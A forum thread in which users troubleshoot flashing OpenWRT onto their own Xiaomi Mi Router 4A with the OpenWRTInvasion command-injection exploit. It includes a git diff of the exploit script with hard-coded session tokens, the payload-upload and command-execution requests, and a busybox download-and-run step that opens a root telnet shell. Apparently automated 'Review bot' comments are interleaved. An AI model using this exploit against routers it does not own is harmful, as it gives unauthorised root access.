Xiaomi Mi Router 4A Gigabit Edition (R4AG/R4A Gigabit) -- fully supported and flashable with OpenWRTInvasion

yes

Connection specific DNS suffix. . :
Link: local IPv6 address. . . : fe80 :: f163: 124e: 6ecc: 7f2b%
Automatic configuration IPv4 address: 169.254.127.43
Subnet mask. . . . . . . . . . . . : 255.255.0.0
Default Gateway. . . . . :

It seems all has gone ok

Router IP address: 192.168.1.91
stok: xxxxxxxxxxxxxxxxxxxx
****************
router_ip_address: 192.168.1.91
stok: xxxxxxxxxxxxxxxxxxxxxxxxxx
****************
start uploading config file...
start exec command...
done! Now you can connect to the router using telnet (user: root, password: none)
In MacOS, execute in the terminal:
telnet 192.168.1.91

But then telnet does not work (and also FTP doesn't)

vittorio@vittorio-Notebook ~/OpenWRTInvasion $ telnet 192.168.1.91
Trying 192.168.1.91...
telnet: Unable to connect to remote host: Connection refused

I've retried the exploit and rebooted copying the new stok.
What can I check?

Thanks

Hmmm that's probably not given via DHCP so I would say it's not working. When you tried the debrick method, I know the light didn't flash, but did you get anything in the log saying that something tried to connect?

As per the video, try running the exploit again. If that fails, try rebooting the router and running it again (but remember that if you reboot the router it will can't your Stok code, so you will need to relogin and copy the new one)

already done at least three times as below
exploit->exploit again->reboot and get new stok and repeat all three times


I get the data when I don't set the IP on the PC; when I put a fixed IP it stops generating that data

Try the method described here with that software; I always found bootp buggy. Also unplug the rest of the network if you have anything else on it.

That normally cures the issue. What OS are you using, and do you have any outgoing firewalls?

@morhimi did you have any similar issues?

I've been testing for more than 2 hours without existing so far

when the IP of the ethernet in the PC changes, it stops generating the data of the previous picture

Sorry, I meant to post the link; try this method:

I'm on a laptop with Linux Mint
The Xiaomi router is connected via WAN to a Fritz 7590 (no firewall) and the laptop is connected to the Xiaomi router via wireless and internet access works fine.

I have AdGuard on my network, but I've disabled it during the exploit and while trying telnet

The only thing that is different from how I've done it successfully in the past is that I've never done the exploit via wireless, try plugging into one of the LAN ports with your laptop and see if that works?

Don't know why, but if I connect wired, I lose the internet connection, even if WAN is still connected to the main router.
Xiaomi router is set as wired repeater

I already tried it, the same without success

I'm sorry then, I'll have a think but hopefully someone else has some ideas. My final suggestion would be to get a CH341 and reflash the chip with a known working firmware for your exact model


That would be my last chance.

I will try to reset the router and start from scratch...

Thanks!!!


thanks, I have no knowledge of operating the CH341

what did you do? which router do you have?


Hello,
The problem of woody4165 looks completely similar to my issue. (Xiaomi Mi Router 4A Gigabit Edition (R4AG/R4A Gigabit) -- fully supported and flashable with OpenWRTInvasion).
As suggested by hoddy, I had already tried to telnet from my Windows computer and from the Raspberry Pi. Both ended the same way, with the telnet connection refused.

Compared to woody, my rpi is connected through LAN to the Xiaomi router and my computer through the Xiaomi wifi. In both cases I have an internet connection.

I am waiting for an SPI flasher but it might take time to come. That's why I was hoping to flash it thanks to the Invasion.

And my router is on version 2.28.62, the latest official firmware available, and supposed to work..

I actually didn't face such issues;
in my case, the routers were fresh out of the box, configured with their default config.
I did the initial setup to set the wifi password, with my Mac connected to a LAN port and the WAN port connected to a nearby switch for internet access.

Once the router was working, I started to run the exploit from the terminal. At the time (not sure if it's still the same) the exploit code asked for the STOK as user input and didn't print the response from the server.

I hard-coded my STOK in the script (probably not needed) and enabled printing of the responses; that is how I saw that I received what looked like a bad response and the exploit didn't work. It appeared that somehow the STOK had changed, so after updating the STOK everything went smoothly.

Since the router was connected to the internet and my 4A 100M has an official 19.07 image, I just fetched the file to /tmp and wrote it.

My git diff:

~/r/OpenWRTInvasion ❯❯❯ git diff                                                                                                                                                                                                                    master ✱ ◼
diff --git a/remote_command_execution_vulnerability.py b/remote_command_execution_vulnerability.py
index af5842b..3b681da 100644
--- a/remote_command_execution_vulnerability.py
+++ b/remote_command_execution_vulnerability.py
@@ -18,12 +18,14 @@ import shutil
 import tarfile
 import requests

-router_ip_address = input("Router IP address: ")
-# router_ip_address = "192.168.0.21"
+# router_ip_address = input("Router IP address: ")^M
+router_ip_address = "192.168.31.1"^M

 # get stok
-stok = input("stok: ")
-# stok = "eeb59f33a51cd46649cd4ad1e3f50ecf"
+# stok = input("stok: ")^M
+# stok = "25bc061fc6f48fdbdda2359b844aa13f" mi4ac1^M
+stok = "8a65444b70fa14ebcd64bc29679ee509" # mi4ac2^M
+stok = "d86d055fdb0a91b38c539319b744bb46"^M

 # From https://blog.securityevaluators.com/show-mi-the-vulns-exploiting-command-injection-in-mi-router-3-55c6bcb48f09
 # In the attacking machine (macos), run the following before executing this script: /usr/bin/nc -l 4444
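Review bot: the two consecutive `stok = "..."` assignments at the end of this hunk make the `# mi4ac2` line dead code, since the second assignment immediately overwrites it; keep a single assignment, and because the stok is a live session token for the router's web UI, read it from the original `input()` prompt or an environment variable rather than committing it to a tracked file. The `^M` markers also show the added lines were saved with CRLF endings in an LF file; convert them back to LF (or set `core.autocrlf`) so the diff does not mix line endings.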
@@ -61,12 +63,12 @@ with tarfile.open("build/payload.tar.gz", "w:gz") as tar:
 ## upload config file
 print("start uploading config file...")
 r1 = requests.post("http://{}/cgi-bin/luci/;stok={}/api/misystem/c_upload".format(router_ip_address, stok), files={"image":open("build/payload.tar.gz",'rb')}, proxies=proxies)
-# print(r1.text)
+print(r1.text)^M

 ## exec download speed test, exec command
 print("start exec command...")
 r2 = requests.get("http://{}/cgi-bin/luci/;stok={}/api/xqnetdetect/netspeed".format(router_ip_address, stok), proxies=proxies)
-# print(r2.text)
+print(r2.text)^M

 print("done! Now you can connect to the router using telnet (user: root, password: none)")
 print("In MacOS, execute in the terminal:")
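Review bot: enabling `print(r1.text)` and `print(r2.text)` is the right debugging step, but the script still prints "done! Now you can connect to the router using telnet" regardless of what the router returned, which is how a stale stok goes unnoticed. Call `r1.raise_for_status()` and `r2.raise_for_status()` and inspect the returned body, aborting with a clear error before the success message when either request was rejected; the `^M` endings on the two added lines should be converted to LF as in the previous hunk.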
diff --git a/script.sh b/script.sh
index ff3c519..d37669d 100644
--- a/script.sh
+++ b/script.sh
@@ -16,6 +16,7 @@ exploit() {
     rm -rf busybox
     curl "https://www.busybox.net/downloads/binaries/1.31.0-defconfig-multiarch-musl/busybox-mipsel" --output busybox
     chmod +x busybox
+    sleep 30

     # Start telnet
     ./busybox telnetd
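Review bot: `sleep 30` before `./busybox telnetd` is an arbitrary delay and does not address the likely failure visible in the surrounding context: the `curl` call has no `-f`/`--fail`, so if the download from busybox.net fails (no WAN access, DNS or TLS error) curl writes the error page into `busybox`, `chmod +x` still succeeds, and `./busybox telnetd` fails silently, which matches the "Connection refused" symptom reported earlier in the thread. Use `curl -fsSL ... --output busybox`, then verify the file before starting telnetd (at minimum `[ -s busybox ] && ./busybox >/dev/null` so a non-binary is caught, preferably a comparison against a known SHA-256 of the expected binary), and log the failure instead of continuing.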